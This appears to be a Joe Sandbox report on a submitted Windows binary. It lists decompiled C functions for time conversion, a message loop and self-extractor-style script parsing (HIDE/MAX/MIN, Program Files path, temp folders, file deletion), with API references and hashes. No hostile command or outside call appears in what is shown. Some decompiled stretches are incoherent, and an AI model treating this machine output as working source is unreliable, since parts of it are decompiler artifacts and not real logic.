				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0006ACF5() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E0007E7E0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00070cbe
0x00070cc5
0x00070cca
0x00070ccf
0x00070cd3
0x00070cd7
0x00070cdb
0x00070cdf
0x00070ce3
0x00070ce7
0x00070ceb
0x00070cef
0x00070cf3
0x00070cf7
0x00070cfd
0x00070d01
0x00070d15
0x00070da7
0x00070da9
0x00070d1b
0x00070d27
0x00070d47
0x00070d56
0x00070d64
0x00070d72
0x00070d7d
0x00070d82
0x00070d88
0x00070d8d
0x00070d8f
0x00070d92
0x00070d29
0x00070d31
0x00070d37
0x00070d3a
0x00070d3a
0x00070d9e
0x00070da0
0x00070da0
0x00070dac
0x00070dac
0x00070daf
0x00070db1
0x00070dba

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00070D0D

Part of subcall function 0006ACF5: GetVersionExW.KERNEL32(?), ref: 0006AD1A

LocalFileTimeToFileTime.KERNEL32(?,00070CB8), ref: 00070D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00070D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00070D56
SystemTimeToFileTime.KERNEL32(?,00070CB8), ref: 00070D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00070D72

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 1fd827f88a79f35d44f51fdbdff3d9b5d6b828e8fbe03b20942a3a655f64b885
Instruction ID: bdd83bf9570023d7d0a255aae4379c613fca304c352a26c0808a01b75b8135e4
Opcode Fuzzy Hash: 1fd827f88a79f35d44f51fdbdff3d9b5d6b828e8fbe03b20942a3a655f64b885
Instruction Fuzzy Hash: 17310C7A900209EBCB10DFE4C8859EFFBBCFF58700B04455AE955E3210E734AA45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 000791B0 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E000791B0(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E0007FDFA(_a8, 0x953ac, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0x93260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E0007FDFA(_t34, 0x953ec, _t26) != 0) {
						if(E0007FDFA(_t34, 0x953cc, _t26) != 0) {
							if(E0007FDFA(_t34, 0x9539c, _t26) != 0) {
								if(E0007FDFA(_t34, 0x9543c, _t26) != 0) {
									if(E0007FDFA(_t34, 0x9538c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x000791b4
0x000791b9
0x000791c7
0x000791cc
0x000791de
0x0007926d
0x0007926d
0x00079270
0x00079272
0x0007927a
0x00079280
0x00079282
0x0007928e
0x00000000
0x0007928f
0x000791f5
0x00079210
0x0007922b
0x00079246
0x0007926b
0x00079286
0x00079289
0x00000000
0x00079289
0x00000000
0x0007926b
0x00079248
0x0007924b
0x0007924e
0x00079252
0x00079256
0x00000000
0x00079256
0x0007922d
0x00079230
0x00000000
0x00079230
0x00079212
0x00079215
0x00000000
0x00079215
0x000791f7
0x000791fa
0x00000000
0x000791fa
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 000791D4
_memcmp.LIBVCRUNTIME ref: 000791EB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6bcc8bc30665ba334b1433a305ca2fe49445051576126002d69e2c5a52f27779
Instruction ID: 37e9b7bf868a328514c13142cf07c6e3fa9fb5eacdda737d4fd5a1c027119b50
Opcode Fuzzy Hash: 6bcc8bc30665ba334b1433a305ca2fe49445051576126002d69e2c5a52f27779
Instruction Fuzzy Hash: C2218171A4010EBBDB15AA11CC82E7F77EDAB50784B10C129FD0D9A203E278ED469798

Uniqueness

Uniqueness Score: -1.00%

Function 0007D2E6 Relevance: 9.0, APIs: 6, Instructions: 43
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007D2E6(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x0007d2f2
0x0007d2ff
0x0007d304
0x0007d314
0x0007d31d
0x0007d327
0x0007d331
0x0007d331
0x0007d33c
0x0007d342
0x00000000
0x0007d346
0x0007d34b

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0007D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0007D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0007D31D
TranslateMessage.USER32(?), ref: 0007D327
DispatchMessageW.USER32(?), ref: 0007D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0007D33C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: d940f59f1ac63b0806f286a4291a8f0ecef1a6f2b4d39a0ab7ef59dfdd2c85e8
Instruction ID: d21ff4dd663c5167b7088291fd46d38ecb1e66c398b687ee9a0c49647083ad75
Opcode Fuzzy Hash: d940f59f1ac63b0806f286a4291a8f0ecef1a6f2b4d39a0ab7ef59dfdd2c85e8
Instruction Fuzzy Hash: 8CF03C72E01219ABDB205BA1DC4CEDBBF7DEF52391F108413F64AD2011D6388641CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0007C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0007C40E(void* __ecx, void* __edx, void* __esi) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t275;
				void* _t288;
				signed int _t291;
				void* _t294;
				void* _t295;
				signed int _t296;
				void* _t300;

				L0:
				while(1) {
					L0:
					_t294 = __esi;
					_t288 = __edx;
					 *0xbec98 = 1;
					_t275 = _t300 - 0x3508;
					if( *((short*)(_t300 - 0x3508)) != 0x3c) {
						goto L96;
					}
					L86:
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					__eax = E000815E8(__ecx);
					_pop(__ecx);
					__ecx = 0x3e;
					if(__eax == 0) {
						goto L96;
					}
					L87:
					_t101 = __eax + 2; // 0x2
					__ecx = _t101;
					 *(__ebp - 0x14) = _t101;
					__ecx = 0;
					 *__eax = __cx;
					__eax = __ebp - 0x108;
					_push(0x64);
					_push(__ebp - 0x108);
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					while(1) {
						L88:
						__ebx = E0007A6C7();
						if(__ebx == 0) {
							break;
						}
						L89:
						if( *(__ebp - 0x108) == 0) {
							break;
						}
						L90:
						__eax = __ebp - 0x108;
						__eax = E000717AC(__ebp - 0x108, L"HIDE");
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__edi = __edi & __eax;
						__eax = __ebp - 0x108;
						__eax = E000717AC(__ebp - 0x108, L"MAX");
						if(__eax == 0) {
							__edi = 3;
						}
						__eax = __ebp - 0x108;
						__eax = E000717AC(__ebp - 0x108, L"MIN");
						if(__eax == 0) {
							__edi = 6;
						}
						_push(0x64);
						__eax = __ebp - 0x108;
						_push(__ebp - 0x108);
						_push(__ebx);
					}
					L95:
					__ebx =  *(__ebp - 0x14);
					L96:
					if( *((intOrPtr*)(_t300 + 0x10)) != 5) {
						L99:
						if( *((intOrPtr*)(_t300 + 0x10)) == 4) {
							if(_t294 == 6) {
								E0007CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 0);
							}
						}
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t300 - 0x15; // 0xffffcae3
							_t209 = _t300 - 0xd; // 0xffffcaeb
							_t210 = _t300 - 0x3508; // 0xffff95f0
							_t211 = _t300 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t300 + 0xc)));
							_t220 = E0007AA36();
							_t275 =  *((intOrPtr*)(_t300 + 0x10));
							 *((intOrPtr*)(_t300 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t300 - 0x3508;
								_t295 = _t300 - 0x1bd58;
								_t291 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E000717AC(_t300 - 0xfd58,  *((intOrPtr*)(0x9e618 + _t296 * 4))) != 0) {
								_t296 = _t296 + 1;
								if(_t296 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							if(_t296 > 0xd) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t296 * 4 +  &M0007CAA1))) {
								case 0:
									L9:
									__eflags = _t275 - 2;
									if(_t275 == 2) {
										E00079DA4(_t300 - 0x7d50, 0x800);
										E0006A49D(E0006B965(_t300 - 0x7d50, _t300 - 0x3508, _t300 - 0xdd58, 0x800), _t275, _t300 - 0x8d58, _t296);
										 *(_t300 - 4) = 0;
										E0006A5D7(_t300 - 0x8d58, _t300 - 0xdd58);
										E000670BF(_t300 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t283 = _t300 - 0x8d58;
											_t235 = E0006A52A(_t300 - 0x8d58, _t288, _t300 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t300 - 0x5d50, 0);
											__eflags =  *(_t300 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t300 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t300 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t298 = 0;
													_push(0);
													goto L20;
													L20:
													E0006400A(_t300 - 0x1108, 0x800, L"%s.%d.tmp", _t300 - 0x5d50);
													_t302 = _t302 + 0x14;
													_t246 = GetFileAttributesW(_t300 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t298 = _t298 + 1;
														__eflags = _t298;
														_push(_t298);
														goto L20;
													} else {
														_t249 = MoveFileW(_t300 - 0x5d50, _t300 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t300 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0006B4F7(_t283, __eflags, _t300 - 0x7d50, _t300 - 0x1108, 0x800);
											E0006B207(__eflags, _t300 - 0x1108, 0x800);
											_t299 = E000835B3(_t300 - 0x7d50);
											__eflags = _t299 - 4;
											if(_t299 < 4) {
												L14:
												_t260 = E0006B925(_t300 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E000835B3(_t300 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t300 + _t263 * 2 - 0x5d4e)) = 0;
												E0007F350(0x800, _t300 - 0x40, 0, 0x1e);
												_t302 = _t302 + 0x10;
												 *((intOrPtr*)(_t300 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t300 - 0x30)) = _t266;
												 *((intOrPtr*)(_t300 - 0x38)) = _t300 - 0x5d50;
												_push(_t300 - 0x40);
												 *0xc2074();
												goto L16;
											}
											L13:
											_t271 = E000835B3(_t300 - 0x1108);
											__eflags = _t299 - _t271;
											if(_t299 > _t271) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
										E0006A4B3(_t300 - 0x8d58);
									}
									goto L172;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E000835B3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xbdc84);
										__eax = E000835DE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E00087168(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L000835CE(__esi);
										}
									}
									goto L172;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L172;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L172;
									}
									L42:
									__eflags =  *0xaa472 - __di;
									if( *0xaa472 != __di) {
										goto L172;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E000835B3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L172;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E000817CB(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0xaa472;
												E0006FE56(0xaa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E0007A8D0(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xaa472); // executed
												__eax = __ebp - 0x1108;
												__eax = E000835E9(__ebp - 0x1108, 0xaa472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L172;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xc2028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xc2024();
													_push( *(__ebp - 0x1c));
													 *0xc2004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1108) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E000835B3(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E000835B3(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L172;
										} else {
											__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0xaa46c - 1;
									__eflags = __eax - 0xaa46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *__edi & __cl;
									_pop(es);
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xa8453 = __cl;
										 *0xa8460 = 1;
										goto L172;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xa8453 = __cl;
										L79:
										 *0xa8460 = __cl;
										goto L172;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L172;
									}
									L77:
									 *0xa8453 = 1;
									goto L79;
								case 6:
									goto L0;
								case 7:
									L105:
									__eflags = __ebx - 1;
									if(__eflags != 0) {
										L122:
										__eflags = __ebx - 7;
										if(__ebx == 7) {
											__eflags =  *0xaa46c;
											if( *0xaa46c == 0) {
												 *0xaa46c = 2;
											}
											 *0xa9468 = 1;
										}
										goto L172;
									}
									L106:
									__eax = __ebp - 0x7d50;
									__edi = 0x800;
									GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
									E0006B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
									__esi = 0;
									_push(0);
									while(1) {
										L108:
										_push( *0x9e5f8);
										__ebp - 0x7d50 = E0006400A(0xa946a, __edi, L"%s%s%u", __ebp - 0x7d50);
										__eax = E0006A180(0xa946a);
										__eflags = __al;
										if(__al == 0) {
											break;
										}
										L107:
										__esi =  &(__esi->i);
										__eflags = __esi;
										_push(__esi);
									}
									L109:
									__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xa946a);
									__eflags =  *(__ebp - 0x3508);
									if( *(__ebp - 0x3508) == 0) {
										goto L172;
									}
									L110:
									__eflags =  *0xb6b7a;
									if( *0xb6b7a != 0) {
										goto L172;
									}
									L111:
									__eax = 0;
									 *(__ebp - 0x1508) = __ax;
									__eax = __ebp - 0x3508;
									_push(0x2c);
									_push(__ebp - 0x3508);
									__eax = E000815E8(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										L118:
										__eflags =  *(__ebp - 0x1508);
										if( *(__ebp - 0x1508) == 0) {
											__ebp - 0x1bd58 = __ebp - 0x3508;
											E0006FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
											__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
										}
										__ebp - 0x3508 = E0007A4F2(__ebp - 0x3508);
										__eax = 0;
										 *(__ebp - 0x2508) = __ax;
										__ebp - 0x1508 = __ebp - 0x3508;
										__eax = E00079F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
										__eflags = __eax - 6;
										if(__eax == 6) {
											goto L172;
										} else {
											L121:
											__eax = 0;
											__eflags = 0;
											 *0xa8450 = 1;
											 *0xa946a = __ax;
											__eax = EndDialog( *(__ebp + 8), 1);
											goto L122;
										}
									}
									L112:
									__edx = 0;
									__esi = 0;
									__eflags =  *(__ebp - 0x3508) - __dx;
									if( *(__ebp - 0x3508) == __dx) {
										goto L118;
									}
									L113:
									__ecx = 0;
									__eax = __ebp - 0x3508;
									while(1) {
										L114:
										__eflags =  *__eax - 0x40;
										if( *__eax == 0x40) {
											break;
										}
										L115:
										__esi =  &(__esi->i);
										__eax = __ebp - 0x3508;
										__ecx = __esi + __esi;
										__eax = __ebp - 0x3508 + __ecx;
										__eflags =  *__eax - __dx;
										if( *__eax != __dx) {
											continue;
										}
										L116:
										goto L118;
									}
									L117:
									__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
									__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
									__eax = 0;
									__eflags = 0;
									 *(__ebp + __esi * 2 - 0x3508) = __ax;
									goto L118;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E00087107(__ebx, __edi);
											_pop(__ecx);
											 *0xbec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xbec90 = E0007AB9A(__ecx, __edx, __eflags);
									}
									 *0xb6b7b = 1;
									goto L172;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L172;
									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E00086420( *(__ebp - 0x1bd58) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xbbb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E0006FE56();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0xbab82);
											_push(__eax);
											__eax = E0006FE56();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xbcb82);
											_push(__eax);
											__eax = E0006FE56();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E000857E6(__ebp - 0x6d50, __ebp - 0x19d58);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											goto L157;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L157;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L152:
													__esi->i = __di;
													L153:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L154;
												}
												L146:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L148:
													_push(0x20);
													_pop(__eax);
													do {
														L149:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L151:
													_push(__eax);
													__eax = E000857E6();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L153;
												}
												L147:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L151;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L154;
											}
											goto L145;
											L154:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L157;
									} else {
										L138:
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E000857E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
										_push(__ebx);
